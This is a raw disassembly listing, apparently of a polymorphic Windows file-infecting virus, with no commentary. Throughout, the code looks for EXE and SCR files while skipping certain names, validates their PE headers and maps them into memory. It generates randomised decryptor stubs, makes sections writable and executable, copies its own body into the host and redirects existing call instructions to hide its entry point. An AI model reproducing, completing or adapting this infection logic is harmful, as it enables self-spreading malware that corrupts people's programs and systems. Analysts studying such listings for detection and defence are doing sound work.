jz short loc_3150C774
cmp ebx, 0E1253F30h
jz short loc_3150C774
call dword ptr [ebp+403992h]
loc_3150C774: ; CODE XREF: sub_3150C65E+D6�j
; sub_3150C65E+DE�j ...
pop ebx
jmp loc_3150C6EB
; ---------------------------------------------------------------------------
loc_3150C77A: ; CODE XREF: sub_3150C65E+92�j
pop esi
loc_3150C77B: ; CODE XREF: sub_3150C65E+60�j
; sub_3150C65E+6C�j
add edx, 14h
jmp loc_3150C672
; ---------------------------------------------------------------------------
locret_3150C783: ; CODE XREF: sub_3150C65E+18�j
; sub_3150C65E+22�j
retn
sub_3150C65E endp
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_3150C785 proc near ; CODE XREF: UPX2:3150C8C3�p
; UPX2:3150C8E9�p
push 4
pop eax
call sub_3150BDA2
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_3150BDA2
add edx, 8
xchg edx, ecx
loc_3150C7AD: ; CODE XREF: sub_3150C785:loc_3150C7EC�j
push 5
pop eax
call sub_3150BDA2
cmp dl, 3
jnb short loc_3150C7C5
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_3150C7EC
; ---------------------------------------------------------------------------
loc_3150C7C5: ; CODE XREF: sub_3150C785+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_3150C7E6
mov al, 11h
call sub_3150BDA2
mov eax, 1
loc_3150C7DA: ; CODE XREF: sub_3150C785+5D�j
test dl, dl
jz short loc_3150C7EB
shl eax, 1
dec dl
jmp short loc_3150C7DA
; ---------------------------------------------------------------------------
jmp short loc_3150C7EB
; ---------------------------------------------------------------------------
loc_3150C7E6: ; CODE XREF: sub_3150C785+47�j
mov eax, 80000000h
loc_3150C7EB: ; CODE XREF: sub_3150C785+57�j
; sub_3150C785+5F�j
stosd
loc_3150C7EC: ; CODE XREF: sub_3150C785+3E�j
loop loc_3150C7AD
retn
sub_3150C785 endp
; ---------------------------------------------------------------------------
loc_3150C7EF: ; CODE XREF: sub_3150D249+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3150C804
mov al, 60h
stosb
loc_3150C804: ; CODE XREF: UPX2:3150C7FF�j
test dword ptr [ebp+403431h], 1000003h
jz loc_3150C90A
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0EEDA73C8h
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_3150C882
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_3150C84D
mov eax, 2E8B6467h
loc_3150C84D: ; CODE XREF: UPX2:3150C846�j
stosd
mov ax, 0
stosw
jz short loc_3150C859
mov al, 5Dh
stosb
loc_3150C859: ; CODE XREF: UPX2:3150C854�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_3150C880
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_3150C880
mov eax, 0F8ED83h
loc_3150C880: ; CODE XREF: UPX2:3150C868�j
; UPX2:3150C879�j
stosd
dec edi
loc_3150C882: ; CODE XREF: UPX2:3150C835�j
test dword ptr [ebp+403431h], 3
jz short loc_3150C892
mov al, 0E9h
stosb
stosd
loc_3150C892: ; CODE XREF: UPX2:3150C88C�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_3150C90A
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_3150C785
mov al, 20h
call sub_3150C59E
jecxz short loc_3150C90A
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_3150C8FD
call sub_3150C785
mov al, 1Fh
call sub_3150C59E
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_3150C8FD: ; CODE XREF: UPX2:3150C8E7�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_3150C90A: ; CODE XREF: UPX2:3150C80E�j
; UPX2:3150C8A9�j ...
test dword ptr [ebp+403431h], 4
jz short loc_3150C928
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_3150C928: ; CODE XREF: UPX2:3150C914�j
test dword ptr [ebp+403431h], 8
jnz short loc_3150C97E
cmp byte ptr [ebp+40342Fh], 0
jz short loc_3150C97E
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_3150C97C
mov al, 49h
stosb
mov ax, 0FC75h
loc_3150C97C: ; CODE XREF: UPX2:3150C973�j
stosw
loc_3150C97E: ; CODE XREF: UPX2:3150C932�j
; UPX2:3150C93B�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_3150C99F
mov al, 58h
or al, [ebp+403429h]
stosb
loc_3150C99F: ; CODE XREF: UPX2:3150C994�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_3150C9B2
add ah, 28h
loc_3150C9B2: ; CODE XREF: UPX2:3150C9AD�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_3150C9D6
mov al, 50h
add al, [ebp+403429h]
stosb
loc_3150C9D6: ; CODE XREF: UPX2:3150C9CB�j
test dword ptr [ebp+403431h], 80h
jnz short loc_3150C9ED
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_3150CA2A
; ---------------------------------------------------------------------------
loc_3150C9ED: ; CODE XREF: UPX2:3150C9E0�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_3150C9FF
mov al, 29h
loc_3150C9FF: ; CODE XREF: UPX2:3150C9FB�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_3150CA22
mov ah, 0C8h
loc_3150CA22: ; CODE XREF: UPX2:3150CA1E�j
or ah, [ebp+40342Ah]
stosw
loc_3150CA2A: ; CODE XREF: UPX2:3150C9EB�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_3150CAAE
test dword ptr [ebp+403431h], 400h
jnz short loc_3150CA59
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_3150CAA6
; ---------------------------------------------------------------------------
loc_3150CA59: ; CODE XREF: UPX2:3150CA4C�j
test dword ptr [ebp+403431h], 800h
jnz short loc_3150CA76
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_3150CA8B
; ---------------------------------------------------------------------------
loc_3150CA76: ; CODE XREF: UPX2:3150CA63�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_3150CA8B: ; CODE XREF: UPX2:3150CA74�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_3150CA9E
add ah, 8
loc_3150CA9E: ; CODE XREF: UPX2:3150CA99�j
or ah, [ebp+40342Bh]
stosw
loc_3150CAA6: ; CODE XREF: UPX2:3150CA57�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_3150CAAE: ; CODE XREF: UPX2:3150CA40�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_3150CAC3
mov al, 50h
add al, [ebp+403429h]
stosb
loc_3150CAC3: ; CODE XREF: UPX2:3150CAB8�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_3150CAD3
add al, 4
loc_3150CAD3: ; CODE XREF: UPX2:3150CACF�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_3150CAF0
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3150CAF0: ; CODE XREF: UPX2:3150CAE7�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_3150CB02
mov ah, 29h
loc_3150CB02: ; CODE XREF: UPX2:3150CAFE�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_3150CB20
mov al, 86h
loc_3150CB20: ; CODE XREF: UPX2:3150CB1C�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_3150CB34
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3150CB34: ; CODE XREF: UPX2:3150CB2B�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_3150CB4B
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_3150CB5A
; ---------------------------------------------------------------------------
loc_3150CB4B: ; CODE XREF: UPX2:3150CB3E�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_3150CB5A: ; CODE XREF: UPX2:3150CB49�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_3150CB95
test dword ptr [ebp+403431h], 40000h
jnz short loc_3150CB8C
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_3150CB94
; ---------------------------------------------------------------------------
loc_3150CB8C: ; CODE XREF: UPX2:3150CB70�j
mov al, 40h
or al, [ebp+40342Bh]
loc_3150CB94: ; CODE XREF: UPX2:3150CB8A�j
stosb
loc_3150CB95: ; CODE XREF: UPX2:3150CB64�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_3150CBB1
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_3150CBB9
; ---------------------------------------------------------------------------
loc_3150CBB1: ; CODE XREF: UPX2:3150CB9F�j
mov al, 48h
or al, [ebp+40342Ah]
loc_3150CBB9: ; CODE XREF: UPX2:3150CBAF�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_3150CBED
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_3150CC08
mov cl, 77h
jmp short loc_3150CC08
; ---------------------------------------------------------------------------
loc_3150CBED: ; CODE XREF: UPX2:3150CBC6�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_3150CC08: ; CODE XREF: UPX2:3150CBE7�j
; UPX2:3150CBEB�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_3150CCB2
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_3150CC49
mov eax, 2E876467h
loc_3150CC49: ; CODE XREF: UPX2:3150CC42�j
stosd
mov eax, 0
stosw
jnz short loc_3150CC59
mov ax, 0E58Bh
stosw
loc_3150CC59: ; CODE XREF: UPX2:3150CC51�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_3150CCAF
test dword ptr [ebp+403431h], 8000000h
jz short loc_3150CCA1
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_3150CC9C
mov ax, 424h
stosw
jmp short loc_3150CCAF
; ---------------------------------------------------------------------------
loc_3150CC9C: ; CODE XREF: UPX2:3150CC92�j
mov al, 8
stosb
jmp short loc_3150CCAF
; ---------------------------------------------------------------------------
loc_3150CCA1: ; CODE XREF: UPX2:3150CC79�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_3150CCB2
; ---------------------------------------------------------------------------
loc_3150CCAF: ; CODE XREF: UPX2:3150CC6D�j
; UPX2:3150CC9A�j ...
mov al, 0C9h
stosb
loc_3150CCB2: ; CODE XREF: UPX2:3150CC25�j
; UPX2:3150CCAD�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3150CCDE
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_3150CCDE: ; CODE XREF: UPX2:3150CCBC�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_3150CD49
test dword ptr [ebp+403431h], 20000000h
jz short loc_3150CD0F
loc_3150CD02: ; CODE XREF: UPX2:3150CD0D�j
test edi, 3
jz short loc_3150CD0F
mov al, 90h
stosb
jmp short loc_3150CD02
; ---------------------------------------------------------------------------
loc_3150CD0F: ; CODE XREF: UPX2:3150CD00�j
; UPX2:3150CD08�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_3150CD3D
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_3150CD47
; ---------------------------------------------------------------------------
loc_3150CD3D: ; CODE XREF: UPX2:3150CD2F�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_3150CD47: ; CODE XREF: UPX2:3150CD3B�j
stosw
loc_3150CD49: ; CODE XREF: UPX2:3150CCF4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3150CDC8
test dword ptr [ebp+403431h], 20000000h
jz short loc_3150CD6E
loc_3150CD61: ; CODE XREF: UPX2:3150CD6C�j
test edi, 3
jz short loc_3150CD6E
mov al, 90h
stosb
jmp short loc_3150CD61
; ---------------------------------------------------------------------------
loc_3150CD6E: ; CODE XREF: UPX2:3150CD5F�j
; UPX2:3150CD67�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_3150CD97
lea eax, [ebp+403429h]
loc_3150CD8F: ; CODE XREF: UPX2:3150CD95�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_3150CD8F
loc_3150CD97: ; CODE XREF: UPX2:3150CD87�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_3150CDAC
mov ax, 0C031h
stosw
loc_3150CDAC: ; CODE XREF: UPX2:3150CDA4�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_3150CDC5
mov ax, 0C031h
stosw
loc_3150CDC5: ; CODE XREF: UPX2:3150CDBD�j
mov al, 0C3h
stosb
loc_3150CDC8: ; CODE XREF: UPX2:3150CD53�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3150CDE0
push edi
sub edi, eax
pop eax
jmp short loc_3150CDF9
; ---------------------------------------------------------------------------
loc_3150CDE0: ; CODE XREF: UPX2:3150CDD8�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_3150CDF9: ; CODE XREF: UPX2:3150CDDE�j
mov [ebp+40106Dh], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_3150CE19
neg eax
loc_3150CE19: ; CODE XREF: UPX2:3150CE15�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_3150CE1D proc near ; CODE XREF: sub_3150D249+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_3150D005
call near ptr loc_3150CE3D+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_3150CE3D: ; CODE XREF: sub_3150CE1D+F�p
add bh, bh
sub_3150CE1D endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_3150C557
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_3150C557
mov edi, [ebp+4039A6h]
push esi
call sub_3150C557
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_3150D005
jz loc_3150D005
add esi, [ebp+4039AAh]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_3150CFD6
loc_3150CEB7: ; CODE XREF: sub_3150CFD6+29�j
lodsb
cmp al, 0E8h
jnz loc_3150CF62
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_3150C557
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_3150CEE5
cmp eax, [edi+0Ch]
jnb loc_3150CFFE
jmp short loc_3150CEF1
; ---------------------------------------------------------------------------
loc_3150CEE5: ; CODE XREF: sub_3150CFD6-FE�j
cmp [ebp+4039A6h], edx
jnz loc_3150CFFE
loc_3150CEF1: ; CODE XREF: sub_3150CFD6-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_3150CFFE
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_3150C557
cmp [ebp+4039A6h], edi
jnz loc_3150CFFE
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_3150CFFE
cmp eax, [edi+8]
jnb loc_3150CFFE
loc_3150CF3A: ; CODE XREF: sub_3150CFD6+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_3150D014
jmp loc_3150CFFE
; ---------------------------------------------------------------------------
loc_3150CF62: ; CODE XREF: sub_3150CFD6-11C�j
cmp al, 0FFh
jnz loc_3150CFFE
cmp byte ptr [esi], 15h
jnz loc_3150CFFE
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_3150C557
cmp [ebp+4039A6h], edi
jnz short loc_3150CFFE
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_3150CFAB
cmp eax, [ebp+4039C6h]
jb short loc_3150D014
loc_3150CFAB: ; CODE XREF: sub_3150CFD6-35�j
cmp eax, 70000000h
jb short loc_3150CFE9
call sub_3150CFD6
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_3150CFD5
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_3150CFF0
; ---------------------------------------------------------------------------
locret_3150CFD5: ; CODE XREF: sub_3150CFD6-F�j
retn
; END OF FUNCTION CHUNK FOR sub_3150CFD6
; =============== S U B R O U T I N E =======================================
sub_3150CFD6 proc near ; CODE XREF: sub_3150CFD6-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 3150CEB7 SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, [ebp+403972h]
call sub_3150C65E
popa
loc_3150CFE9: ; CODE XREF: sub_3150CFD6-26�j
test eax, 80000000h
jnz short loc_3150CFFE
loc_3150CFF0: ; CODE XREF: sub_3150CFD6-3�j
sub eax, [edi+0Ch]
jb short loc_3150CFFE
cmp eax, [edi+8]
jb loc_3150CF3A
loc_3150CFFE: ; CODE XREF: sub_3150CFD6-F9�j
; sub_3150CFD6-EB�j ...
dec ecx
jnz loc_3150CEB7
loc_3150D005: ; CODE XREF: sub_3150CE1D+9�j
; UPX2:3150CE9F�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_3150D050
; ---------------------------------------------------------------------------
loc_3150D014: ; CODE XREF: sub_3150CFD6-7F�j
; sub_3150CFD6-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_3150D050: ; CODE XREF: sub_3150CFD6+3C�j
pop edi
pop esi
retn
sub_3150CFD6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150D053 proc near ; CODE XREF: UPX2:3150D221�p
; sub_3150D249+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_3150D124
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_3150D124
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_3150D5DC
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_3150D5D0
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_3150D5D0
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_3150D5D0
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_3150D5A8
mov [ebp+403972h], eax
locret_3150D124: ; CODE XREF: sub_3150D053+10�j
; sub_3150D053+27�j ...
retn
sub_3150D053 endp
; =============== S U B R O U T I N E =======================================
sub_3150D125 proc near ; CODE XREF: sub_3150D249+117�p
; sub_3150D249+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3150D13F
add eax, [ebp+40106Dh]
loc_3150D13F: ; CODE XREF: sub_3150D125+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_3150D125 endp
; =============== S U B R O U T I N E =======================================
sub_3150D16A proc near ; CODE XREF: sub_3150D249:loc_3150D298�p
; sub_3150D249+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_3150D16F: ; CODE XREF: sub_3150D16A+23�j
jecxz short locret_3150D1A6
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_3150D1A6
cmp dword ptr [edx+0Ch], 1
jb short loc_3150D16F
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_3150D1A6: ; CODE XREF: sub_3150D16A:loc_3150D16F�j
; sub_3150D16A+1D�j ...
retn
sub_3150D16A endp
; =============== S U B R O U T I N E =======================================
sub_3150D1A7 proc near ; CODE XREF: UPX2:3150D233�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3150D1A7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3150D1B4: ; CODE XREF: UPX2:3150D1D5�j
mov ecx, edi
jmp short loc_3150D1C3
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_3150D1BF: ; CODE XREF: UPX2:3150D1D1�j
mov ebx, edi
xor ecx, ecx
loc_3150D1C3: ; CODE XREF: UPX2:3150D1B6�j
; UPX2:3150D1D9�j
lodsb
cmp al, 61h
jb short loc_3150D1CE
cmp al, 7Ah
ja short loc_3150D1CE
sub al, 20h
loc_3150D1CE: ; CODE XREF: UPX2:3150D1C6�j
; UPX2:3150D1CA�j
stosb
cmp al, 5Ch
jz short loc_3150D1BF
cmp al, 2Eh
jz short loc_3150D1B4
cmp al, 0
jnz short loc_3150D1C3
jecxz short locret_3150D1A6
mov eax, [ecx]
cmp eax, 455845h
jz short loc_3150D1F1
cmp eax, 524353h
jnz locret_3150D124
loc_3150D1F1: ; CODE XREF: UPX2:3150D1E4�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3150D124
cmp eax, 4E554357h
jz locret_3150D124
cmp eax, 32334357h
jz locret_3150D124
cmp eax, 4F545350h
jz locret_3150D124
xor ebx, ebx
call sub_3150D053
jz locret_3150D124
xor edx, edx
call sub_3150D249
call sub_3150D1A7
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_3150D586
; =============== S U B R O U T I N E =======================================
sub_3150D249 proc near ; CODE XREF: UPX2:3150D22E�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_3150D586
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_3150D586
test dword ptr [ebx+16h], 2000h
jnz loc_3150D586
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_3150D586
jecxz short loc_3150D298
cmp ecx, 101h
jbe loc_3150D586
loc_3150D298: ; CODE XREF: sub_3150D249+41�j
call sub_3150D16A
jb loc_3150D586
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_3150BDA2
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_3150D2C2: ; CODE XREF: sub_3150D249+92�j
push 20h
dec cl
pop eax
js short loc_3150D2DD
call sub_3150BDA2
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_3150D2C2
; ---------------------------------------------------------------------------
loc_3150D2DD: ; CODE XREF: sub_3150D249+7E�j
; sub_3150D249+CD�j ...
push 6
pop ecx
loc_3150D2E3: ; CODE XREF: sub_3150D249+B8�j
push 6
pop eax
call sub_3150BDA2
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_3150D2E3
test dword ptr [ebp+403431h], 8
jnz short loc_3150D318
cmp byte ptr [ebp+40342Bh], 1
jz short loc_3150D2DD
loc_3150D318: ; CODE XREF: sub_3150D249+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3150D33F
cmp byte ptr [ebp+403429h], 5
jz short loc_3150D2DD
cmp byte ptr [ebp+40342Ah], 5
jz short loc_3150D2DD
cmp byte ptr [ebp+40342Bh], 5
jz short loc_3150D2DD
loc_3150D33F: ; CODE XREF: sub_3150D249+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3150D354
cmp byte ptr [ebp+403429h], 2
ja short loc_3150D2DD
loc_3150D354: ; CODE XREF: sub_3150D249+100�j
and dword ptr [ebp+4039AEh], 0
call loc_3150C7EF
call sub_3150D125
call sub_3150D58F
mov ebx, [ebp+403976h]
call sub_3150D053
jz loc_3150D586
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_3150D16A
jb loc_3150D586
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3150D3BC
lea esi, [ebp+40343Ch]
mov ecx, [ebp+40106Dh]
rep movsb
loc_3150D3BC: ; CODE XREF: sub_3150D249+163�j
push edi
mov ecx, 90Fh
lea esi, [ebp+401000h]
rep movsd
mov cl, 0
jecxz short loc_3150D3D0
rep movsb
loc_3150D3D0: ; CODE XREF: sub_3150D249+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_3150D488
push dword ptr [ebx+28h]
call sub_3150C557
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_3150D488
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3150D40D
xor ecx, ecx
loc_3150D40D: ; CODE XREF: sub_3150D249+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_3150D474
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_3150D44D
neg dword ptr [eax]
loc_3150D44D: ; CODE XREF: sub_3150D249+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
